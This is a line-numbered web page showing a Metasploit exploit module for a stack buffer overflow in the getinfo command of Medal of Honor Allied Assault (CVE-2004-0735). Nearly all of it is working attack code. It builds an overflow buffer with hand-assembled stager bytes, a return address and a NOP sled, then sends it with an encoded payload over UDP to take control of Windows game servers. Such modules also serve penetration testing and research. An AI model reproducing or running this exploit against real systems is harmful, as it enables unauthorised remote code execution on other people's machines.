Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::Udp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Medal of Honor Allied Assault getinfo Stack Buffer Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack based buffer overflow in the getinfo
16
        command of Medal Of Honor Allied Assault.
17
      },
18
      'Author'         => [ 'Jacopo Cervini' ],
19
      'License'        => BSD_LICENSE,
20
      'References'     =>
21
        [
22
          [ 'CVE', '2004-0735'],
23
          [ 'OSVDB', '8061' ],
24
          [ 'EDB', '357'],
25
          [ 'BID', '10743'],
26
        ],
27
      'Privileged'     => false,
28
      'Payload'        =>
29
        {
30
          'Space'    => 512,
31
          'BadChars' => "\x00",
32
        },
33
      'Platform'       => 'win',
34
      'Targets'        =>
35
        [
36
          ['Medal Of Honor Allied Assault v 1.0 Universal', { 'Rets' => [ 111, 0x406957 ] }], # call ebx
37
        ],
38
      'DisclosureDate' => '2004-07-17',
39
      'DefaultTarget' => 0))
40

41
    register_options(
42
      [
43
        Opt::RPORT(12203)
44
      ])
45
  end
46

47
  def exploit
48
    connect_udp
49

50
    # We should convert this to metasm - Patrick
51
    buf = 'B' * target['Rets'][0]
52
    buf << "\x68\x76\x76\x76\x76"*9   	# PUSH 76767676 x 9
53
    buf << "\x68\x7f\x7f\x7f\x7f"     	# PUSH 7F7F7F7F
54
    buf << "\x57"			    	# PUSH EDI
55
    buf << "\x58"			    	# POP EAX
56
    buf << "\x32\x64\x24\x24"	    	# XOR AH,BYTE PTR SS:[ESP+24]
57
    buf << "\x32\x24\x24"		    	# XOR AH,BYTE PTR SS:[ESP]
58
    buf << "\x48"*150			    	# DEC EAX x 150
59
    buf << "\x50\x50"			    	# PUSH EAX x 2
60
    buf << "\x53"				# PUSH EBX
61
    buf << "\x58"				# POP EAX
62
    buf << "\x51"				# PUSH ECX
63
    buf << "\x32\x24\x24"			# XOR AH,BYTE PTR SS:[ESP]
64
    buf << "\x6a\x7f"				# PUSH 7F
65
    buf << "\x5e"				# POP ESI
66
    buf << "\x46"*37				# INC ESI
67
    buf << "\x56"*10				# PUSH ESI
68
    buf << "\x32\x44\x24\x24"		# XOR AL,BYTE PTR SS:[ESP+24]
69
    buf << "\x49\x49"				# DEC ECX
70
    buf << "\x31\x48\x34"			# XOR DWORD PTR DS:[EAX+34],ECX
71
    buf << "\x58"*11				# POP EAX
72
    buf << "\x42"*66
73
    buf << "\x3c"*4
74
    buf << "\x42"*48
75
    buf << [ target['Rets'][1] ].pack('V')
76

77
    req = "\xff\xff\xff\xff\x02" + "getinfo " + buf
78
    req << "\r\n\r\n" + make_nops(32) + payload.encoded
79

80
    udp_sock.put(req)
81

82
    handler
83
    disconnect_udp
84
  end
85
end
86

87